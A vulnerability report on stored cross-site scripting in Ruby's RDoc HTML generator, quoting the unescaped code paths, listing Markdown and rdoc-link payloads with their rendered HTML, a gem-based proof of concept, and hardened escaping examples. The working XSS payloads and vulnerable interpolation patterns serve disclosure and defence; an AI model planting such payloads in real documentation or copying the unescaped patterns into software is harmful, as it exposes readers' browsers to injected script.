XSS in HTML generated by RDoc
Program: Ruby
Reported by: ooooooo_q

## Vulnerability Details
XSS is possible in several places because the HTML generation code in RDoc interpolates document-controlled text and URLs into tags and attributes without escaping them (and without restricting the URL scheme).
### RDoc::Markup::ToHtml#gen_url
https://github.com/ruby/rdoc/blob/v6.3.0/lib/rdoc/markup/to_html.rb#L330
```ruby
def gen_url url, text
  scheme, url, id = parse_url url

  if %w[http https link].include?(scheme) and
     url =~ /\.(gif|png|jpg|jpeg|bmp)$/ then
    "<img src=\"#{url}\" />"          # url is interpolated unescaped into src
  else
    if scheme != 'link' and /\.(?:rb|rdoc|md)\z/i =~ url
      url = url.sub(%r%\A([./]*)(.*)\z%) { "#$1#{$2.tr('.', '_')}.html" }
    end

    text = text.sub %r%^#{scheme}:/*%i, ''
    text = text.sub %r%^[*\^](\d+)$%, '\1'

    link = "<a#{id} href=\"#{url}\">#{text}</a>"   # id, url and text are all unescaped; the scheme is not checked

    link = "<sup>#{link}</sup>" if /"foot/ =~ id

    link
  end
end
```
```md
[<script>alert`link text`</script>](a)
[click](blocked:alert`javascript_scheme`)
[onmouseover](http://"/onmouseover="alert`on_mouse_link`")
[link_image](http://"onerror="alert`link_image`".png)
```
RDoc generates the following HTML: the link text, the `href` value and the image `src` value are all emitted unescaped, and the link scheme is not restricted.
```html
<p><a href="a"><script>alert`link text`</script></a></p>
<p><a href="blocked:alert`javascript_scheme`">click</a></p>
<p><a href="http://"/onmouseover="alert`on_mouse_link`"">onmouseover</a></p>
<p><img src="http://"onerror="alert`link_image`".png" /></p>
```
### RDoc::Markup::ToHtml#handle_RDOCLINK
https://github.com/ruby/rdoc/blob/v6.3.0/lib/rdoc/markup/to_html.rb#L97
```ruby
def handle_RDOCLINK url # :nodoc:
  case url
  when /^rdoc-ref:/
    $'                                  # remainder of the URL returned as raw HTML
  when /^rdoc-label:/
    text = $'

    text = case text
           when /\Alabel-/    then $'
           when /\Afootmark-/ then $'
           when /\Afoottext-/ then $'
           else                    text
           end

    gen_url url, text                   # label text becomes an unescaped id attribute and link text
  when /^rdoc-image:/
    "<img src=\"#{$'}\">"               # remainder interpolated unescaped into src
  else
    url =~ /\Ardoc-[a-z]+:/

    $'                                  # unknown rdoc-* scheme: remainder returned as raw HTML
  end
end
```
```markdown
rdoc-image:"><script>alert(`rdoc-image`)</script>"
rdoc-label::path::"><script>alert(`rdoc-label_id`)</script>"
rdoc-label::"><script>alert(`rdoc-label_path`)</script>"
rdoc-ref:"><script>alert(`rdoc-ref`)</script>"
rdoc-xxx:"><script>alert(`rdoc-xxx`)</script>"
```
```html
<p><img src=""><script>alert(`rdoc-image`)</script>""></p>
<p><a id="path::"><script>alert(`rdoc-label_id`)</script>"" href="#">:path::"><script>alert(`rdoc-label_id`)</script>"</a></p>
<p><a id=""><script>alert(`rdoc-label_path`)</script>"" href="#">:"><script>alert(`rdoc-label_path`)</script>"</a></p>
<p>"><script>alert(`rdoc-ref`)</script>"</p>
<p>"><script>alert(`rdoc-xxx`)</script>"</p>
```
### RDoc::Markup::ToHtmlSnippet#gen_url
https://github.com/ruby/rdoc/blob/v6.3.0/lib/rdoc/markup/to_html_snippet.rb#L168
```ruby
def gen_url url, text
  if url =~ /^rdoc-label:([^:]*)(?::(.*))?/ then
    type = "link"
  elsif url =~ /([A-Za-z]+):(.*)/ then
    type = $1
  else
    type = "http"
  end

  if (type == "http" or type == "https" or type == "link") and
     url =~ /\.(gif|png|jpg|jpeg|bmp)$/ then
    ''
  else
    text.sub(%r%^#{type}:/*%, '')      # link text returned unescaped; it ends up in the search index snippet
  end
end
```
```markdown
[<img/src="."/onerror=alert("search")>](a)
```
The injected tag is written unescaped into `js/search_index.js`, the snippet data that the generated search UI inserts into the page.
```js
["search","","target/search_md.html","","<p><img/src=\".\"/onerror=alert(\"search\")>\n"]
```
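The three code paths above (`ToHtml#gen_url`, `ToHtml#handle_RDOCLINK` and `ToHtmlSnippet#gen_url`) share one defect: values taken from the document are spliced into tags, attributes and snippets unescaped, and the link scheme is never checked. The following Ruby is an added example of a hardened counterpart; it is not RDoc's code and not RDoc's eventual fix. The module name `SafeRDocLink`, its method names, the `http`/`https` allowlist and the simplified `parse_url` (which drops the original's `label-`/`footmark-`/`foottext-` prefix handling) are assumptions made for illustration. It runs the payloads from this report, using `javascript:` where the page shows `blocked:` (assumed to be a platform rewrite of the original payload), and shows each rendered inert.

```ruby
require 'cgi'
require 'uri'

# Hardened stand-in for RDoc::Markup::ToHtml#gen_url / #handle_RDOCLINK.
# Added example: not RDoc's code or its fix; names and allowlist are
# illustrative assumptions.
module SafeRDocLink
  SAFE_SCHEMES = %w[http https].freeze
  IMAGE_EXT    = /\.(gif|png|jpg|jpeg|bmp)\z/i

  # Entity-escape a value for element content or a double-quoted attribute.
  def self.h(s)
    CGI.escapeHTML(s.to_s)
  end

  # Same shape as RDoc's parse_url: [scheme, url, id_attr]. The id
  # attribute value is escaped here, before it is spliced into a tag.
  def self.parse_url(url)
    case url
    when /\Ardoc-label:([^:]*)(?::(.*))?/
      id = $2 ? %( id="#{h($2)}") : ''
      ['link', "##{$1}", id]
    when /\A([a-z]+):/i
      [$1.downcase, url, '']
    else
      ['http', url, '']
    end
  end

  # Accept relative URLs and absolute http(s) URLs only. URI.parse
  # rejects characters such as '"' that the attribute-breakout payloads
  # rely on; any explicit scheme off the allowlist is dropped.
  def self.safe_href(url)
    parsed = URI.parse(url)
    return nil if parsed.scheme && !SAFE_SCHEMES.include?(parsed.scheme.downcase)
    url
  rescue URI::InvalidURIError
    nil
  end

  # Hardened gen_url: an unsafe URL degrades to escaped plain text, and
  # every interpolated value is escaped.
  def self.gen_url(url, text)
    scheme, url, id = parse_url(url)
    href = safe_href(url)
    return h(text) if href.nil?

    if scheme != 'link' && href =~ IMAGE_EXT
      %(<img src="#{h(href)}" />)
    else
      %(<a#{id} href="#{h(href)}">#{h(text)}</a>)
    end
  end

  # Hardened handle_RDOCLINK: where the original returned $' verbatim
  # (rdoc-ref, rdoc-image, unknown rdoc-* schemes), the value is now
  # scheme-checked and/or escaped.
  def self.handle_rdoclink(url)
    case url
    when /\Ardoc-ref:/   then h($')
    when /\Ardoc-label:/ then gen_url(url, $')
    when /\Ardoc-image:/
      src = safe_href($')
      src ? %(<img src="#{h(src)}">) : ''
    else
      url =~ /\Ardoc-[a-z]+:/
      h($')
    end
  end

  # True when no raw tag or event-handler attribute survives in the output.
  def self.inert?(html)
    !html.match?(/<script|\son\w+=/i)
  end
end
```

Two layers do the work. `CGI.escapeHTML` on every interpolated value closes the attribute and element injections; the scheme allowlist handles `javascript:` URLs, which escaping alone cannot, because a well-formed `href="javascript:..."` contains no special characters. `safe_href` leans on `URI.parse`, which is stricter than a browser's URL parser; for an allowlist that is the conservative direction, since anything the browser would tolerate but Ruby rejects is simply not linked.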
### Rubygems RDoc home
https://github.com/ruby/rdoc/blob/v6.3.0/lib/rdoc/generator/template/darkfish/index.rhtml#L20
```html
<p>This is the API documentation for <%= @title %>.
```
XSS is possible because `@title` is interpolated into the template without escaping; when RubyGems runs RDoc for an installed gem, that title is derived from the gem itself, so the gem author controls it.
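As an added example (not the Darkfish template or RubyGems code), the line from `index.rhtml` quoted above is rendered with ERB twice: once as written and once with `ERB::Util#h` applied to `@title`. The gem name used as the title is a constructed value, and the `TitleTemplate` module and its `render` method are assumptions for illustration.

```ruby
require 'erb'

# Added example, not the Darkfish template itself: the same index.rhtml
# line rendered unescaped (as on the page) and with h() applied.
module TitleTemplate
  UNESCAPED = '<p>This is the API documentation for <%= @title %>.'
  ESCAPED   = '<p>This is the API documentation for <%= h @title %>.'

  # Render a template against an object that carries @title, the way
  # Darkfish renders its templates against the generator context.
  def self.render(template, title)
    ctx = Object.new
    ctx.instance_variable_set(:@title, title)
    ctx.extend(ERB::Util)                      # provides h() in the template
    ERB.new(template).result(ctx.instance_eval { binding })
  end
end

# Constructed gem name carrying a tag, standing in for an attacker-chosen title.
payload = 'rdoc_title_xss<img src=x onerror=alert(1)>'
puts TitleTemplate.render(TitleTemplate::UNESCAPED, payload)   # tag survives
puts TitleTemplate.render(TitleTemplate::ESCAPED, payload)     # tag entity-escaped
```

Escaping in the template is the fix that does not depend on how the title is validated upstream; any later change to what RubyGems accepts as a gem name leaves it safe.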
---
### PoC
```
$ gem -v
3.2.17
$ rdoc -v
6.3.1
```
Build the gem using the attached `xss.md` and `rdoc_xss.gemspec` files, install it, and serve its documentation.
```
$ gem build rdoc_xss.gemspec
$ gem install rdoc_title_xss-0.0.1.gem
$ gem server
```
Open http://0.0.0.0:8808/doc_root/rdoc_title_xss-0.0.1/ in a browser to confirm the multiple XSS payloads firing.
[attachment F1291736: screenshot]
## Impact
Any application that uses RDoc to generate HTML from files supplied by an external party can have this XSS injected into its output.
One of these attack methods was previously reported to GitLab (https://hackerone.com/reports/200693); there it is probably neutralised by [html-pipeline](https://github.com/gjtorikian/html-pipeline) sanitizing the output.
## Report Details
State: Closed
Substate: Informative
Weakness: Cross-site Scripting (XSS) - Stored